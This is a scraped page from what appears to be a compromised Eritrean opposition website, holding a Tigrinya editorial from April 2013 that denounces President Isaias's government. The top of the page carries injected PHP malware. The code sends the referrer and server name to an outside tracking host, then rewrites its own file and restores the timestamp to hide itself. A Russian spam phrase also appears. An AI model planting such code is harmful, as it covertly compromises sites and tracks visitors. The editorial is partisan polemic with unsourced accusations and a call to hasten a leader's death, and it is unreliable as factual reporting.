check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ሞት በያኒ ሕማም ዓያኒ
кремлевская диета

ሞት በያኒ ሕማም ዓያኒ

User Rating: / 1
PoorBest 

 

 

 

 

 

 

 

27 ሚያዝያ  2013

   

ሞት በያኒ ሕማም ዓያኒ

ወለድና ዘሕንኽ ታሪክ ሰሪሖም ወይ ከኣ ብዕዩን ኣማውታ ንከይሞቱ ብምሕሳብ ኣማውታይ ኣጸብቐለይ ኢሎም ይምሕጸኑ። ዘሰክፍን ዘይርሳዕ ክፉእ ሕማም ሓሚምካ ንሰብ ኣሸጊርካ ንዝመጽእ ሞት ብምጽላእውንሞት በያኒ ሕማም ዓያኒ ብምባል ፈጣሪ ንኣማውተኦም ከጸብቐሎም ኣበው ይምስሉ። መሲልካ ታይ ኣምጻእካ እንድዩ ነይሩ ብክብረቱ ሞት ተሓሲምዎ ሞቱ ንዘይተርፍ ኣብ ርእሲ ሕፍረት ሕፍረት ዝጉልበብ ንዘሎ ገበነኛ ምሕደራ ኢሳይያስ ብምስትብሃል ምስቲ ምስላ ወለድና ስለዝተመሳሰለልና ነዚ ጥንታዊ ምስላ ወለድና ክነልዕል ዝተገደድና። ገበነኛ ኢሳይያስ ንጠለባት ስርሒት ፎርቶ ደይመደይ ኢሉ ድሕሪ ምድንጓዩ ገለ ናይ ስልጣን ዕድምኡ ዘናውሕ መሲሉ ተራእይዎ ነይሩ። ንምትግባር ከኣ ብዙሓት ናይ ጽላለ ፍጻመታት ክፍጽም ጸኒሑ ኣሎ ካብቶም ሰለስተ ዓበይቲ ተግባራት ኣትኵርና ምስ ንርኢ፦

-       ቀዳማይ፡ ፈተነ ምንዋሕ ስልጣን ዝበሎ ንሰራዊት ብመሃያን መማቕርትን ወሰኽ መብጽዓታት ኣቲኻ ነቲ ተቓውሞ ምዝሕሓል ዝብል ተንኮሉ ስለዘይሰርሐን እኳ ዳኣስ ተቓውሞ ዝበኣሰ ስለዘነሃሃሮን ኣሃዱታት ንስደት ብዝውሕዝ ኣባለን ባዶ ተሪፈን ንዋርድያ ለይቲ ኳስ ክኾና ስለዘይከኣላ ብሽማግለታት ወለዲ ዝቆማ ኣሃዱታት ዕቁር ሰራዊት ክትካእ ምግባርዩ።ቶም ወለዲ ዕድሚኦም ደፈኦም ብዙሓት ቆልዑ ኣድቂቆም ስለዘለዉ ንስደት ክኸዱ ኣይኽእሉን ኢሉ ኣብ ርእሲ ምሕሳቡ መንእሰይ ዝበዝሐ ምዱብ ሰራዊት ዘለዎ ተቓውሞ ኣፈራሪሕካ ንምዝሕሓል ክሕግዝ ኢሉውን ተሓሲቡ ዝተሰረሐ ነይሩ ኮይኑ ግን ህዝባዊ ጠለባት ስርሒት ፎርቶ ንምዱብ ሰራዊትን ንመንእሰያትን ጥራሕ ዘርብሕ ዘይኮነስ ንምልኣተ ህዝብን ሰራዊትን ዘርብሕ ሃገር ካብ ምብትታን ዝፍውስ ፍቱን መድሃኒት ስለዝኾነ እዚ ሽርሒ ‘ዚ ርሑቕ ክጎዓዘሉ ኣይከኣለን። ኩሉ ህዝብን ሰራዊትን ኮላይ ‘ቶም ኣብ ግዜ ዕረፍቶም ብረት ተሸኪሞም ዋርድያ ክሕልውን ኮለል ናበሉ ምዝገባ ህዝቢ ከካይዱን ዝተፈረዶም መሳኺን ወለድና ኣብ ልዕሊ ገበነኛ ኢሳይያስን ግሩሃት ሰዓብቱን ተሪር ተቓውሞ የስምዑ ብምህላዎም ኣኼባታት ምክያድ ኮነ ኣዕናዊ ተግባራት ኢሳይያስ ምስላጥ ኣይከኣለን ዘሎ። ቁጠባ ሃገር ደውታ ፈጢሩ መሃያ መምህራንን ሰራዊትን ምኽፋል ስለዘይከኣለ ገሊኡ ብኳደረ ብመልክዕ እኽሊ እንጀራ ቆረጣን  ናተዋጽአ ገሊኡ ከኣ ካብ ህዝቢ ገንዘብ ብኮታ ክኽፈል ናተገደዱ ‘ቲ ዝበዝሕ ድማ ብተደራራቢ ግብርን ቕጽዓትን ናተኣከበ’ዩ ዝኽፈል ዘሎ ኣብዚ ሓጺር እዋን ድማ ኣብ ርእሲ ‘ቶም ዝተገለጹ ብብዝሒ ናቕፋ ኣብዚሕካ ንሰራዊትን ሰራሕተኛ መንግስትን መሃያ ምኽፋል ተጀሚሩ ኣሎ።

-       ንኤርትራውያን ወሊድካ ምስዓም ሕሩም’ዩ ዝተብሃለ ክመስል ደቂኣነስትዮ ኣብ ዓድታት ሰብኣይ ስለዝጠፍአን ቁጠባአን ስለ ዝማህመነን ብድውለን ክተርፋ ተገዲደን መንእሰይ ዘብኡ ከኣ ኣብ ድፋዕ ተዳጉኑ ሰኣን ሰበይቲ ውላድ ክትክእ ኣይከኣለን ሰብኣይን ሰበይቲን ብዓይኒ ማዕዶ ዝረኣኣይሉ ትውልዲ ዘምከነ ስርዓት ኢሳይያስ ነቲ ኣንጸርጽሮት ኣጋዲድዎ ብግልጺ ወሊድና ክንስዕም ተመርዕና ግርማ ክንለብስ ንደሊ ኢና ኣገልግሎት ገደብ ይገበረሉ ዝብል ተቓውሞ ተበራዒ ሕቶ ኮይኑ ክበልዖ ቀሪቡ ኣሎ።

ኣብዚ ዝሓለፈ ሳምንቲ ናብ ጎረቤት ኢትዮጵያ ዝሰገራ ክልተ ዜጋታት ‘ታ ሓንቲ ሰለስቲኦም ደቃ ብወሰን ዝወለደቶም ኮይና ስለምንታይ ደኣ ሰለስተ ቆልዑ ካብ ሓደ ሰብኣይ ብወሰን ወለድክዮም ተባሂላ “ንሱ’ውን ኣነ ኮይነ ዕድል ጌረ ረኺበዮ ንሱ ሲኢነን ብድውለን ዝተረፋ ኣዋልድ ሃገረይ ኣዲአን ትቁጸረን” ዝበለቶን ሓንቲ ጓል 35 ዓመት ጓል ስለምንታይ ደኣ ዘይተመርዐኺ ክሳብ ሕጂ ተባሂላ ሰብኣይ ኣበይ ኣሎ ሰብኡት ኣብ ድፋዕ ንሕና ኣብ ዓዲ ተመዓዳዶ ኮይኑ ብድውልካ ምንባር’ዩ ዕጫና ኮይኑ ዘሎ ዝበልኦ ሓቂ ማሕበራዊ ቅልውላው ሃገርና ዝበጽሖ ደረጃ ዘረጋግጽ’ዩ።

እዚ ውሽጣዊ ኩነታት ‘ዚ ሃልሃልታ ዝኾኖ ገበነኛ ኢሳይያስ ካልኣይ ሜላ መቃነይ ስልጣነይ ኢሉ ዝሓዞ መደብ ከኣ ቀዳምነት ኣብ ግዳም ዝርከቡ ደገፍቱን ገለ ክመቓቐሉ ዝኽኣሉ ተወላወልትን ብምሓዝ ብሓደ ገጽ ‘ቲ ሓርቢትዎ ዘሎ ሸርፊ ወጻኢ ዘቃልል ገንዘብ ክረክብ ብካሊእ ገጽ ከኣ ኩሉ ኣብ ግዳም ሰፊሩ ስለዘሎ ኣብ ዘለዎ ሒዝካ ነቲ ናይ ውሽጢ ንምብርባር ሆ ክብሉ ምግባር’ዩ ነይሩ።

‘ዚ ዝፍጽሙ ኣባላት ባዶ ሰለስተን ካብኡ ወጻኢ ብኤምባሲታት ዝምርሑ ካልኦት ናይ ማሕበረ ኮም ካድራትን ምውፋር ዝብል ሜላ’ዩ ተኸቲሉ። ነቶም ከበራብርሉ ዝመደቦም ካድራት፡ ብንግዲ መልክዕ ብርኪ ምስ ህግደፍ ክኣቱዉ ብምግባር ኣብ ሃገር መሬት ተዋሂብዎም ‘ቲ ገንዘቦም ኣብኡ ከፍስሱዎሞ ብትሕጃ ናፈራራሕካ ክነብሩ ምግባር ገበናት ኣብ ውሽጢ ሃገር ንዝፈጸሙ ከኣ ገበናትኩም ውዱቕ ክገብር እየ ክከላኸላልኩም እየ ብምባል ሓቢርና ንህልውና እዚ ስርዓት ንሓለዋ ኢልካ ምግዳድ ወዘተ ዝኣመሰሉ መእሰሪ ብምግባር ከይፈትሑ ኣብታ ዓንኬል ዕንይንይ እንዳበሉ ከገልግልዎ ‘ቲ ውጡን ብምግባር’ዩ ስርሕዎ

ነቶም ተወላወልቲ ዝበሃሉ ከኣ ብተመሳሳሊ ቅዲ ሜላን ብገንዘብ ብምዕሳብን ኣብ ደንበ ተቓውሞ ዘለዉ መሲሎም ንኢሳይያስ ከይነሓፍ ናተጻረፉ ኣገልግሎቶም ግን ንዕኡ ክኽውን ዝተሓረዩ እዮም ነይሮም።

‘ዚ ንምግባር ክሳብ በዓል የማነ ማንኪ ብኣካል ረኺቦም ከዘራርብዎምን ናብ ኤምባሲታት ከተሓሕዝዎምን ተጌሩ’ዩ። ኣብ ውሽጢ ዘሎ ሽፋን ሚዲያ ስለዝተዳኸመ ነዞም ተወላወልትን እምባሕ በሃልቲ ኣብ ውሽጢ ሃገር ገበን ዝሰርሑ ዜጋታትን ሙሉእ ሽፋን ክህቦኦም ተሓሲቡ ከኣ ብዙሓት መሽረፈታት ኣብ ደገ ክህልዋን ብውሁድ ቅኒት ክሰርሓ ምእንቲ ከኣ ኤምባሲታት ኢሳይያስ ብበጀትን ብኣንፈት ፕሮፖጋንዳን ክመርሐኦን መምርሒ ወሪዱ’ዩ።

ኣንፈት ናይቲ ፕሮፓጋንዳ ‘ቶም ተወላወልቲ ዝብሃሉን ገለ ከም በዓል ግርማ ኣስመሮምን ወዲ ገራህቱን ዝኣመሰሉ ምስ ገበነኛ ኢሳይያስ መዓልታዊ ርክባት ዘለዎም ከኣ ምስታ ናይ ግዳም ባዶ ሰለስተ ብምምኽኻር ግዱሳት ዜጋታት ናበሉ መናወርያ ክብትኑ ብምግባር ‘ዚአን ናኾምሳዕካ ንምኻድ ነቶም ሓያላት በዳህቲ ውዱባት ሚዲያታትን ውልቀሰባትን ከኣ ጸለሎ ቐቢእካ ምጥርጣር ክፍጠር ንምግባር ያኢ ተሓሲቡ እዩ ‘ቲ ውጡን ናይ ደገ ተሰንዑ ነይሩ። ኮይኑ ግን ብሓደ ገጽ ‘ቶም ተወላወልትን ገለ ኣንፈታ ተዋሂብዎም ዝተዋፈሩ ኣባላት ህግደፍን ልሳኖም ንኢሳይያስ ንምጽራፍ ፍቓደኛ ኮይኑ ስለዘይምእዛዘሎም ንሱ ህዝቢ ንሱ ሃገር ንሱ ታሪክ ዝፈጠሮ ሕጋዊ መራሒና ካብ ምባል ስለዘየድሓኖም ኣብኡ ከሎ ዝተወሃቦም ዕዮ ገዛ ተፈዲሑ ንማንኪ ኢሳይያስ ከመይ ዲኻ ኦሮንቴሽን ሂብካዮም ነይርካ ‘ዚ ደኣ ዓይኒ ዘፍጠጠንዶ ኮይኑ ኢሉ ክሳብ ዝገንሖ ይገብሮም ኣሎ። ብቀንዱ ከኣ ‘ቲ ክበታተንን ክደናገርን ዝተደለየ መንእሰይን ምልኣተ ደንበ ተቓውሞን ንቕሓቱ ኣበሪኹ ስለዝጸንሐ ኣሸንኳይ ክዳናገር ናይዘን መሽረፈታትን ሃሱሳት ኢሳይያስን ህውተታ ከም ህልዉ ጌሩ መልሲ ክህብን ግዚኡ ኣብኡ ከባኽንን’ውን ኣይከኣለን ‘ዚኣ ኣማውታ ኢሳይያስ ካብ ዘሕምቃት ካልኣይቲ መርድእ እያ።

‘ታ ሳልሰይቲ ንኢሳይያስ ዘሰከፈቶ ድሕሪ ቐዛፍን ሙባረክን መጸግዒ ክትኾነኒ ገለ መቃነይ ስልጣን ዝኸውን ትካቦ ነዳድን ሰልድን ክትህበኒ እያ ዲፕሎማሲ ምስምስ  ከውሊ ክትኾነኒ እያ ዝበላ ሃገረ ቐጠር ኣብ ኣብያተ ጸሎት ከም ዝኣተወ ከልቢ ተሰጕጕ  ብሕፍረት ብዘይ ሓደ ፍረ ምስኣፋነወቶን ምስኡ ዝኸዱ ልኡኻት ኣብ ደገ ይጽንሑ ምባለን’ዩ። በዚ ከይተሓጸረት ከኣ ኢሳይያስ ናሃለወ ብዛዕባ ዲፕሎማሲያዊ ርክባት ጎረባብቲ ኮነ ዓለም ኣየልዕልን ኢላ ብቃልን ብግብርን ምርግጋጻ’ዩ። ምስዚ ተደሚሩ ከኣ ማሕበረሰብ ዓለም ብሓፈሻ ብፍላይ ከኣ ኣፍሪቃ ንገበናት ደቂሰባትን ንዘይሕጋዊ ምዝውዋር ኣጽዋርን ትኩረት ብምሃብ ክሰርሕሉ ሰለዝጀመሩ እዛ ናይ ሲናይ ንግዲ ደቂሰባትን ዘን ኣብ ዝተፈላለያ ረጽሚ ዘለወን ሃገራት ኣጽዋር ናሸጠ ዝረኽበን ሸርፊ ወጻእን ቀንዲ ምንጪ መቃነይ ስልጣኑ ስለዝኾና ከይደርቅኦ ድቃስ ስኢኑ’ዩ ወሪሑ። ነዚኣ ክብል’ውን ናብታ ንገዛእ ርእሳ ክተቐስን ዘይከኣለት ሃገረ ግብጺ ደብዳቤ  ብምልኣኽ ብኣካል ነቲ ዝበሎ ዘብራህርሁ ላዕለዎት ልኡኻት ብምስዳድ ኣነ ፈለግ ኒል ናይ ግብጺ ብሕታዊ ሃፍትን መሰልን ምዃኑ’የ ዝኣምን ኣብዚ ዝግበር ኽድምና ተሃልዩ ኣለኹ ባዕለይ ጥራሕ ንስኺ ነዘን ናይ ሲናይ ንግዲ ደቂ ኣዳም በዘን በትን ኢሉ ማሕበረሰብ ዓለም ከይቆጻጸራ ኣዕንቅፍለይ ገለ ንመፈጸሚ ምህዋኽ ጸጥታ ጎረባብተይ ዝኸውን ሓገዝ ከኣ ርጠብለይ ኢሉ ተማሕጽኑ’ዩ። ግብጺ ከኣ እታ ኣብ ሲናይ ዘላ ከም ስታላ ትሕለብ ሸርፊ ወጻኢ ከይትደርቅ ዳይመዳይ እናበልና ክነጽንሓ ኢና እቲ ሓገዝ  ግን ንባዕልና‘ውን ኣብ ጸገም ስለዘለና ቀስ ኢልና ክንሪኦ ኢሎም መሊሶም እዮም።

እዛ ሽዑ ንሽዑ ገንዘብ ዘይምሃብ ንኢሳይያስ ሳልሰይቲ ኣማውትኡ እተኽፋኣሉ ነጥቢ ኮይና እታ ምስ በዳዊንን ራሻይዳን ተመሓዝዩ ዝገብራ ዘሎ ንግዲ መሸጣ ውሽጣዊ ናውቲ  ኣካላት ኤርትራውያን ክትቕጽል ክንገብራ ኢና ትብል ነጥቢ ግን ኣሐጉሳቶ’ያ፡ ብዝተኣተውሉ ቃል መሰረት ከኣ ኣምባሳደር ግብጺ ኣብ ኢትዮጵያ ንኣረጋጋኢ ጸጥታ ኣፍሪቃ ዝኾነ ጣና ፎሮም ተጠሊዑ ብጋዜጠኛ ሜሮን እስቲፋኖስን ካልኦትን ንዝቐረበ ናይ ሲናይ ጸገም ንምግታእ ዝሕግዝ ሰነድ ብትሪ ብምቅዋም ቃሎም ኣሐዲሶምሉ ኣለው። እዚኣ’ውን ግን ሞት ንዘይተርፍ ማሕጎማ ከምዝበልዎ ቀዳሞት ወለድና ዝበኣሰ ሕማም ክተጋድድሉ እምበር ስልጣኑሲ ክተጻነሐሉ ኣይኮነትን። ሞት ኢሳይያስን ምፍራስ ስርዓቱን ዘይተርፍ ኮይኑ ኣሎ። ህዝብታት ኤርትራ ምስ ጎረባብቶም ናይ ሰላም ሃዋህው ኣብ ዶባት ፈጢሮም ኣለው። ኣባላት ፖሊስን ሰራዊትን ከይተረፉ ዝተሰረቓን ተሓዋዊሶን ናብ ሓዲኡ  ቦታ ዝሰገራን ጥሪት ብክልቲኡ ሸነኽ ደላሊኻ ምምልላስን ሓበሬታ ኤርትራን ኢትዮጵያን ምልውዋጥን ልሙድ ተርእዮ እናኾነ መጺኡ ኣሎ። ኣብ ዶባት ዝርከቡ ህዝብታት እክስን ጌሶን  ከይተረፈ ስግር መረብ ምስ ዝርከቡ ኣሕዋቶም ይለዋወጡን ይገዛዘሙን እዮም ዘለው።

ክመቃቅሎም ዝደለየ ናይ ወለድን ናይ መንእሰያትን ክልተ ዓይነት ሰራዊት’ውን ኣይተኸፋፈሉን እኳድኣስ ዝበኣሰ ኢሳይያስ መጥፍኢ ዓዲ ምዃኑ’ዩ ኣቃልዕዎ። ኣብ ግዳም ዝርከብ ህዝቢ ንምክፍፋል ዝፈሓሶ ተንኮል ብኣንጻሩ ብዝበለጸ ሓድነቱ ኣስጢሙ ኣብ ምውልዋል ዝነበሩ ሓዲኣ ክሕዙን ምድንጋር ከብቅዕን’ዩ ባይታ ኣንጺፉ ዘሎ። ኣብ ሲናይ ዘሎ ገበናት ዋንኡን ኣፈጻሚኡን ግብጽን ኢሳይያስን ምዃኖም ከኣ ሕጂ ብልሳን ኣምባሳደር ግብጺ ተፈዲሒ ስለዘሎ ድሕር ስርሒት ፎርቶ’ውን ሞት ኢሳይያስ ዘይትረፍ ኣማውትኡ ምዕያኑ ጥራሕ’ዩ ኣረጋጊጹልና ዘሎ። እምበኣር ኢሳይያስ ከቶ ነይድሕንን ምስቲ ዕዩን ተግባራቱ ሃገርን  ህዝብን ዓይኑ ከይኸይድ  ‘ታይ  ንግበር? ዝብል ጥራሕ’ዩ’ቲ  ኣገዳሲ ነገር  ነዚ ከኣ ሞት ኢሳይያስ ምቅልጣፍን ተወዲብካ ከም ሓደ ሰብ ምቅላስን’ዩ እቲ እንኮ መፍትሒ እሞ ሃየ ኣብ ጓል መገዲ ከይደኸምና ኣብ ቀንዲ ውራይ ምድሓን ሃገር ንረባረብ’ዩ ናይ ሎሚ መልእኽትና።

ባንዩ ኣሎ ክወግሕ’ዩ!!

ልዕሊ ኩሉ ቅድሚ ኩሉን ንድሕነት ሃገር!!

ሕመረት ልምዓትና ኣብ ዳራ ዓወትና!!

ኤዲቶርያል ቦርድ ወጋሕታ/ሳሊና

27 ሚያዝያ 2013

 Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشرSecurity code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player